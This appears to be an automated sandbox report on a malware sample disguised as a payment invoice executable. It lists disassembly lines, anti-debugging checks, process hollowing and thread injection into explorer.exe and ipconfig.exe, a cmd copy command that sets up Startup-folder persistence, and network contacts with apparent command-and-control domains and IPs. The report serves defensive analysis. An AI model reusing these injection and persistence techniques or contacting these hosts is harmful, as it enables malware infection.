          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C37EB mov eax, dword ptr fs:[00000030h]4_2_017C37EB
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C37EB mov eax, dword ptr fs:[00000030h]4_2_017C37EB
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C53C5 mov eax, dword ptr fs:[00000030h]4_2_017C53C5
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01793FC5 mov eax, dword ptr fs:[00000030h]4_2_01793FC5
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01793FC5 mov eax, dword ptr fs:[00000030h]4_2_01793FC5
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01793FC5 mov eax, dword ptr fs:[00000030h]4_2_01793FC5
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792FB0 mov eax, dword ptr fs:[00000030h]4_2_01792FB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792FB0 mov eax, dword ptr fs:[00000030h]4_2_01792FB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792FB0 mov eax, dword ptr fs:[00000030h]4_2_01792FB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792FB0 mov ecx, dword ptr fs:[00000030h]4_2_01792FB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792FB0 mov eax, dword ptr fs:[00000030h]4_2_01792FB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792FB0 mov eax, dword ptr fs:[00000030h]4_2_01792FB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792FB0 mov eax, dword ptr fs:[00000030h]4_2_01792FB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792FB0 mov eax, dword ptr fs:[00000030h]4_2_01792FB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792FB0 mov eax, dword ptr fs:[00000030h]4_2_01792FB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792FB0 mov eax, dword ptr fs:[00000030h]4_2_01792FB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792FB0 mov eax, dword ptr fs:[00000030h]4_2_01792FB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A2F9A mov eax, dword ptr fs:[00000030h]4_2_017A2F9A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A2F9A mov eax, dword ptr fs:[00000030h]4_2_017A2F9A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BEB9A mov eax, dword ptr fs:[00000030h]4_2_017BEB9A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BEB9A mov eax, dword ptr fs:[00000030h]4_2_017BEB9A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE79D mov eax, dword ptr fs:[00000030h]4_2_017BE79D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE79D mov eax, dword ptr fs:[00000030h]4_2_017BE79D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE79D mov eax, dword ptr fs:[00000030h]4_2_017BE79D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE79D mov eax, dword ptr fs:[00000030h]4_2_017BE79D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE79D mov eax, dword ptr fs:[00000030h]4_2_017BE79D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179F395 mov eax, dword ptr fs:[00000030h]4_2_0179F395
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01794B94 mov edi, dword ptr fs:[00000030h]4_2_01794B94
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A1B8F mov eax, dword ptr fs:[00000030h]4_2_017A1B8F
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A1B8F mov eax, dword ptr fs:[00000030h]4_2_017A1B8F
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C138B mov eax, dword ptr fs:[00000030h]4_2_017C138B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C138B mov eax, dword ptr fs:[00000030h]4_2_017C138B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C138B mov eax, dword ptr fs:[00000030h]4_2_017C138B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8F80 mov eax, dword ptr fs:[00000030h]4_2_017B8F80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017D927A mov eax, dword ptr fs:[00000030h]4_2_017D927A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BAE73 mov eax, dword ptr fs:[00000030h]4_2_017BAE73
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BAE73 mov eax, dword ptr fs:[00000030h]4_2_017BAE73
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BAE73 mov eax, dword ptr fs:[00000030h]4_2_017BAE73
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BAE73 mov eax, dword ptr fs:[00000030h]4_2_017BAE73
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BAE73 mov eax, dword ptr fs:[00000030h]4_2_017BAE73
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B4670 mov eax, dword ptr fs:[00000030h]4_2_017B4670
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B4670 mov eax, dword ptr fs:[00000030h]4_2_017B4670
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B4670 mov eax, dword ptr fs:[00000030h]4_2_017B4670
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B4670 mov eax, dword ptr fs:[00000030h]4_2_017B4670
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C3E70 mov eax, dword ptr fs:[00000030h]4_2_017C3E70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A766D mov eax, dword ptr fs:[00000030h]4_2_017A766D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B8E60 mov ecx, dword ptr fs:[00000030h]4_2_017B8E60
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01799240 mov eax, dword ptr fs:[00000030h]4_2_01799240
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01799240 mov eax, dword ptr fs:[00000030h]4_2_01799240
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01799240 mov eax, dword ptr fs:[00000030h]4_2_01799240
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01799240 mov eax, dword ptr fs:[00000030h]4_2_01799240
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A7E41 mov eax, dword ptr fs:[00000030h]4_2_017A7E41
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A7E41 mov eax, dword ptr fs:[00000030h]4_2_017A7E41
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A7E41 mov eax, dword ptr fs:[00000030h]4_2_017A7E41
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A7E41 mov eax, dword ptr fs:[00000030h]4_2_017A7E41
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A7E41 mov eax, dword ptr fs:[00000030h]4_2_017A7E41
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A7E41 mov eax, dword ptr fs:[00000030h]4_2_017A7E41
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01798239 mov eax, dword ptr fs:[00000030h]4_2_01798239
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01798239 mov eax, dword ptr fs:[00000030h]4_2_01798239
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01798239 mov eax, dword ptr fs:[00000030h]4_2_01798239
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179A63B mov eax, dword ptr fs:[00000030h]4_2_0179A63B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179A63B mov eax, dword ptr fs:[00000030h]4_2_0179A63B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB236 mov eax, dword ptr fs:[00000030h]4_2_017BB236
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB236 mov eax, dword ptr fs:[00000030h]4_2_017BB236
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB236 mov eax, dword ptr fs:[00000030h]4_2_017BB236
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB236 mov eax, dword ptr fs:[00000030h]4_2_017BB236
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB236 mov eax, dword ptr fs:[00000030h]4_2_017BB236
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB236 mov eax, dword ptr fs:[00000030h]4_2_017BB236
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA229 mov eax, dword ptr fs:[00000030h]4_2_017BA229
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA229 mov eax, dword ptr fs:[00000030h]4_2_017BA229
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA229 mov eax, dword ptr fs:[00000030h]4_2_017BA229
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA229 mov eax, dword ptr fs:[00000030h]4_2_017BA229
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA229 mov eax, dword ptr fs:[00000030h]4_2_017BA229
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA229 mov eax, dword ptr fs:[00000030h]4_2_017BA229
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA229 mov eax, dword ptr fs:[00000030h]4_2_017BA229
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA229 mov eax, dword ptr fs:[00000030h]4_2_017BA229
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA229 mov eax, dword ptr fs:[00000030h]4_2_017BA229
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179E620 mov eax, dword ptr fs:[00000030h]4_2_0179E620
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01794A20 mov eax, dword ptr fs:[00000030h]4_2_01794A20
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01794A20 mov eax, dword ptr fs:[00000030h]4_2_01794A20
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CA61C mov eax, dword ptr fs:[00000030h]4_2_017CA61C
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01791618 mov eax, dword ptr fs:[00000030h]4_2_01791618
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B3A1C mov eax, dword ptr fs:[00000030h]4_2_017B3A1C
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01795210 mov eax, dword ptr fs:[00000030h]4_2_01795210
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01795210 mov ecx, dword ptr fs:[00000030h]4_2_01795210
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01795210 mov eax, dword ptr fs:[00000030h]4_2_01795210
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01795210 mov eax, dword ptr fs:[00000030h]4_2_01795210
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179C600 mov eax, dword ptr fs:[00000030h]4_2_0179C600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179C600 mov eax, dword ptr fs:[00000030h]4_2_0179C600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179C600 mov eax, dword ptr fs:[00000030h]4_2_0179C600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov ecx, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov ecx, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov ecx, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov ecx, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B5600 mov eax, dword ptr fs:[00000030h]4_2_017B5600
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A76E2 mov eax, dword ptr fs:[00000030h]4_2_017A76E2
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017D3EE4 mov eax, dword ptr fs:[00000030h]4_2_017D3EE4
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C16E0 mov ecx, dword ptr fs:[00000030h]4_2_017C16E0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017912D4 mov eax, dword ptr fs:[00000030h]4_2_017912D4
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01793ACA mov eax, dword ptr fs:[00000030h]4_2_01793ACA
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017D8EC7 mov eax, dword ptr fs:[00000030h]4_2_017D8EC7
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C12BD mov esi, dword ptr fs:[00000030h]4_2_017C12BD
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C12BD mov eax, dword ptr fs:[00000030h]4_2_017C12BD
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C12BD mov eax, dword ptr fs:[00000030h]4_2_017C12BD
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CFAB0 mov eax, dword ptr fs:[00000030h]4_2_017CFAB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01791AA0 mov eax, dword ptr fs:[00000030h]4_2_01791AA0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C5AA0 mov eax, dword ptr fs:[00000030h]4_2_017C5AA0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C5AA0 mov eax, dword ptr fs:[00000030h]4_2_017C5AA0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017952A5 mov eax, dword ptr fs:[00000030h]4_2_017952A5
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017952A5 mov eax, dword ptr fs:[00000030h]4_2_017952A5
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017952A5 mov eax, dword ptr fs:[00000030h]4_2_017952A5
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017952A5 mov eax, dword ptr fs:[00000030h]4_2_017952A5
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017952A5 mov eax, dword ptr fs:[00000030h]4_2_017952A5
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CDE9E mov eax, dword ptr fs:[00000030h]4_2_017CDE9E
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01793E80 mov eax, dword ptr fs:[00000030h]4_2_01793E80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01793E80 mov eax, dword ptr fs:[00000030h]4_2_01793E80
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017D95D0 LdrInitializeThunk,4_2_017D95D0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 20.216.185.237 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.idszua.com
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lokoua.com
          Source: C:\Windows\explorer.exeDomain query: www.chernenko.xyz
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeNetwork Connect: 83.229.19.64 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: A20000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: A20000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeMemory written: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess created: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeProcess created: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exeJump to behavior
          Source: explorer.exe, 00000005.00000002.586880233.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.582386650.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.347759661.0000000005910000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000002.582386650.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.337513271.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000005.00000002.582386650.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.337513271.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000002.582386650.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.337513271.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.337016856.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.581807825.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeQueries volume information: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
